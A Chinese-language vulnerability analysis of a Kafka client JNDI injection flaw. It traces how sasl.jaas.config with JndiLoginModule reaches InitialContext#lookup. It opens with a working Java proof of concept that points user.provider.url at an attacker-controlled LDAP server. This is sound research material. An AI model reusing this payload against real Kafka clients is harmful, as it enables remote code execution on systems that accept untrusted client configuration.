前言 今天拜读了4ra1n师傅的Kafka Connect RCE 如何检测 ,感觉很有收获。遂决定对这个漏洞进行分析,了解一下漏洞原理。
POC 导入依赖:
1 2 3 4 5 <dependency> <groupId>org.apache.kafka</groupId> <artifactId>kafka-clients</artifactId> <version>3.3.0</version> </dependency>
POC如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 public static void main (String[] args) { Properties props = new Properties (); props.put("sasl.mechanism" ,"SCRAM-SHA-256" ); props.put("security.protocol" ,"SASL_SSL" ); props.put("sasl.jaas.config" ,"com.sun.security.auth.module.JndiLoginModule " + "required user.provider.url=\"ldap://192.168.135.132:1389/Deserialization/URLDNS/26ed58ce.ipv6.1433.eu.org\" " + "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " + "group.provider.url=\"xxx\";" ); props.put("bootstrap.servers" , "123123123:123" ); props.put("key.deserializer" , "org.apache.kafka.common.serialization.StringDeserializer" ); props.put("value.deserializer" , "org.apache.kafka.common.serialization.StringDeserializer" ); props.put("key.serializer" , "org.apache.kafka.common.serialization.StringSerializer" ); props.put("value.serializer" , "org.apache.kafka.common.serialization.StringSerializer" ); new Thread (() -> { Producer<String, String> producer = new KafkaProducer <>(props); producer.send(new ProducerRecord <>("test" , "hello" , "world" )); producer.close(); }).start(); }
执行结果:
漏洞分析: 首先跟进org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Properties):
这里调用了org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Properties, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer),跟进一下:
这里首先调用了org.apache.kafka.common.utils.Utils#propsToMap对传入的Properties类型的对象进行了处理,代码如下:
由名字就可以看出是将Properties类型改为Map类型,得到的结果如下所示:
接着又将得到的Map类型的对象传入至org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(java.util.Map<java.lang.String,java.lang.Object>, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer):
调用了org.apache.kafka.clients.producer.ProducerConfig#appendSerializerToConfig:
其中keySerializer和valueSerializer都为null,因此我们在最开始传入的Properties对象中设置键为key.deserializer和value.serializer的键值对,否则会直接抛出异常。接着又将得到的newConfigs传入org.apache.kafka.clients.producer.ProducerConfig#ProducerConfig(java.util.Map<java.lang.String,java.lang.Object>):
最终得到一个ProducerConfig对象,字段情况如下:
之后又将这些参数传入org.apache.kafka.clients.producer.KafkaProducer#KafkaProducer(org.apache.kafka.clients.producer.ProducerConfig, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.common.serialization.Serializer, org.apache.kafka.clients.producer.internals.ProducerMetadata, org.apache.kafka.clients.KafkaClient, org.apache.kafka.clients.producer.internals.ProducerInterceptors<K,V>, org.apache.kafka.common.utils.Time):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 KafkaProducer(ProducerConfig config, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors<K, V> interceptors, Time time) { try { this .producerConfig = config; this .sender = this .newSender(logContext, kafkaClient, this .metadata); String ioThreadName = "kafka-producer-network-thread | " + this .clientId; this .ioThread = new KafkaThread (ioThreadName, this .sender, true ); this .ioThread.start(); config.logUnused(); AppInfoParser.registerAppInfo("kafka.producer" , this .clientId, this .metrics, time.milliseconds()); this .log.debug("Kafka producer started" ); } catch (Throwable var24) { this .close(Duration.ofMillis(0L ), true ); throw new KafkaException ("Failed to construct kafka producer" , var24); } }
这里对this.producerConfig进行赋值,还调用了org.apache.kafka.clients.producer.KafkaProducer#newSender方法,这个方法中的参数并不重要,直接看代码:
可以看到这里调用了org.apache.kafka.clients.ClientUtils#createChannelBuilder方法,继续跟进:
其中config是this.producerConfig,这里从config中获取到security.protocol以及sasl.mechanism所对应的值并赋值给相应的变量,其中securityProtocol:
之后又调用了org.apache.kafka.common.network.ChannelBuilders#clientChannelBuilder:
这里判断securityProtocol是否是SASL_PLAINTEXT或SASL_SSL,如果是则进入判断。之后判断contextType是否为空,这个值不为null,clientSaslMechanism的值就是sasl.mechanism对应的值,也就是POC中的SCRAM-SHA-256:
因此sasl.mechanism的值是必须存在的,否则将抛出异常。之后又调用了org.apache.kafka.common.network.ChannelBuilders#create:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 private static ChannelBuilder create (SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) { Map<String, Object> configs = channelBuilderConfigs(config, listenerName); Object channelBuilder; switch (securityProtocol) { case SSL: requireNonNullMode(mode, securityProtocol); channelBuilder = new SslChannelBuilder (mode, listenerName, isInterBrokerListener, logContext); break ; case SASL_SSL: case SASL_PLAINTEXT: requireNonNullMode(mode, securityProtocol); String sslClientAuthOverride = null ; Object jaasContexts; if (mode != Mode.SERVER) { JaasContext jaasContext = contextType == Type.CLIENT ? JaasContext.loadClientContext(configs) : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs); jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext); } else { List<String> enabledMechanisms = (List)configs.get("sasl.enabled.mechanisms" ); jaasContexts = new HashMap (enabledMechanisms.size()); Iterator var18 = enabledMechanisms.iterator(); String listenerClientAuth; while (var18.hasNext()) { listenerClientAuth = (String)var18.next(); ((Map)jaasContexts).put(listenerClientAuth, JaasContext.loadServerContext(listenerName, listenerClientAuth, configs)); } if (listenerName != null && securityProtocol == SecurityProtocol.SASL_SSL) { String configuredClientAuth = (String)configs.get("ssl.client.auth" ); listenerClientAuth = (String)config.originalsWithPrefix(listenerName.configPrefix(), true ).get("ssl.client.auth" ); if (listenerClientAuth == null ) { sslClientAuthOverride = SslClientAuth.NONE.name().toLowerCase(Locale.ROOT); if (configuredClientAuth != null && !configuredClientAuth.equalsIgnoreCase(SslClientAuth.NONE.name())) { log.warn("Broker configuration '{}' is applied only to SSL listeners. Listener-prefixed configuration can be used to enable SSL client authentication for SASL_SSL listeners. In future releases, broker-wide option without listener prefix may be applied to SASL_SSL listeners as well. All configuration options intended for specific listeners should be listener-prefixed." , "ssl.client.auth" ); } } } } channelBuilder = new SaslChannelBuilder (mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier); break ; case PLAINTEXT: channelBuilder = new PlaintextChannelBuilder (listenerName); break ; default : throw new IllegalArgumentException ("Unexpected securityProtocol " + securityProtocol); } ((ChannelBuilder)channelBuilder).configure(configs); return (ChannelBuilder)channelBuilder; }
首先得到一个Map类型的对象configs,部分键值对是我们在POC中设置好的。之后进行switch语句,若securityProtocol为SASL_SSL或SASL_PLAINTEXT,就会执行如下一行代码:
1 channelBuilder = new SaslChannelBuilder (mode, (Map)jaasContexts, securityProtocol, listenerName, isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache, tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
因此channelBuilder是一个SaslChannelBuilder类型的对象,之后退出switch语句,调用了channelBuilder的configure方法,参数为configs。跟进:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 public void configure (Map<String, ?> configs) throws KafkaException { try { this .configs = configs; ...... Iterator var12 = this .jaasContexts.entrySet().iterator(); while (var12.hasNext()) { Map.Entry<String, JaasContext> entry = (Map.Entry)var12.next(); String mechanism = (String)entry.getKey(); LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs); this .loginManagers.put(mechanism, loginManager); Subject subject = loginManager.subject(); this .subjects.put(mechanism, subject); if (this .mode == Mode.SERVER && mechanism.equals("GSSAPI" )) { this .maybeAddNativeGssapiCredentials(subject); } } if (this .securityProtocol == SecurityProtocol.SASL_SSL) { this .sslFactory = new SslFactory (this .mode, this .sslClientAuthOverride, this .isInterBrokerListener); this .sslFactory.configure(configs); } } catch (Throwable var9) { this .close(); throw new KafkaException (var9); } }
其中this.jaasContexts:
进入while循环,执行如下一行代码:
1 LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
跟进org.apache.kafka.common.security.authenticator.LoginManager#acquireLoginManager:
其中jaasConfigValue的value字段为POC中sasl.jaas.config的值。loginManager为null,调用org.apache.kafka.common.security.authenticator.LoginManager#LoginManager:
其中loginMetadata的loginClass字段为:
因此this.login是一个org.apache.kafka.common.security.authenticator.DefaultLogin实例。之后又调用了this.login.login(),跟进org.apache.kafka.common.security.authenticator.AbstractLogin#login:
又调用了javax.security.auth.login.LoginContext#login:
调用了javax.security.auth.login.LoginContext#invokePriv,并传入了LOGIN_METHOD,它的值是”login”:
javax.security.auth.login.LoginContext#invokePriv部分代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 private void invoke (String methodName) throws LoginException { for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) { try { int mIndex = 0 ; Method[] methods = null ; if (moduleStack[i].module != null ) { methods = moduleStack[i].module .getClass().getMethods(); } else { Class<?> c = Class.forName( moduleStack[i].entry.getLoginModuleName(), true , contextClassLoader); Constructor<?> constructor = c.getConstructor(PARAMS); Object[] args = { }; moduleStack[i].module = constructor.newInstance(args); methods = moduleStack[i].module .getClass().getMethods(); for (mIndex = 0 ; mIndex < methods.length; mIndex++) { if (methods[mIndex].getName().equals(INIT_METHOD)) { break ; } } Object[] initArgs = {subject, callbackHandler, state, moduleStack[i].entry.getOptions() }; methods[mIndex].invoke(moduleStack[i].module , initArgs); } for (mIndex = 0 ; mIndex < methods.length; mIndex++) { if (methods[mIndex].getName().equals(methodName)) { break ; } } Object[] args = { }; boolean status = ((Boolean)methods[mIndex].invoke (moduleStack[i].module , args)).booleanValue();
moduleStack如下:
在invoke函数中,遍历了moduleStack,进入else:
这里INIT_METHOD的值是”initialize”,这里是反射获取moduleStack[i].entry.getLoginModuleName()也就是com.sun.security.auth.module.JndiLoginModule中的所有方法并遍历,如果找到initialize方法,就利用反射的方法进行调用。
执行完else中的代码之后,接着执行如下的代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 for (mIndex = 0 ; mIndex < methods.length; mIndex++) { if (methods[mIndex].getName().equals(methodName)) { break ; } } Object[] args = { }; boolean status = ((Boolean)methods[mIndex].invoke (moduleStack[i].module , args)).booleanValue();
如果上面调用initialize方法的部分看明白了,就能一眼看出这里是调用com.sun.security.auth.module.JndiLoginModule的login方法。跟进后:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 public boolean login () throws LoginException { try { attemptAuthentication(false ); succeeded = true ; if (debug) { System.out.println("\t\t[JndiLoginModule] " + "regular authentication succeeded" ); } return true ; } catch (LoginException le) { cleanState(); if (debug) { System.out.println("\t\t[JndiLoginModule] " + "regular authentication failed" ); } throw le; } }
调用了com.sun.security.auth.module.JndiLoginModule#attemptAuthentication:
其中userProvider是在initialize方法中得到的:
也就是我们POC中的恶意ldap服务:
之后执行lookup完成JNDI注入。
最后贴一下调用链:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 new KafkaProducer<>(props) -> KafkaProducer#KafkaProducer(...) -> KafkaProducer#newSender(logContext, kafkaClient, this.metadata) -> ClientUtils#createChannelBuilder(this.producerConfig, this.time, logContext) -> ChannelBuilders#clientChannelBuilder(...; -> ChannelBuilders#create(...; -> ((ChannelBuilder)channelBuilder)#configure(configs); -> LoginManager#acquireLoginManager(...) -> new LoginManager(jaasContext, saslMechanism, configs, loginMetadata) -> LoginContext#login() -> LoginContext#invokePriv(LOGIN_METHOD) -> LoginContext#invoke(methodName) -> JndiLoginModule#login() -> JndiLoginModule#attemptAuthentication(true) -> InitialContext#lookup(userProvider)
这个漏洞的利用条件还是比较高的,基于远程LDAP引用注入需要java版本小于11.0.1、8u191、7u201、6u211,因此公网上能够找到的目标并不多。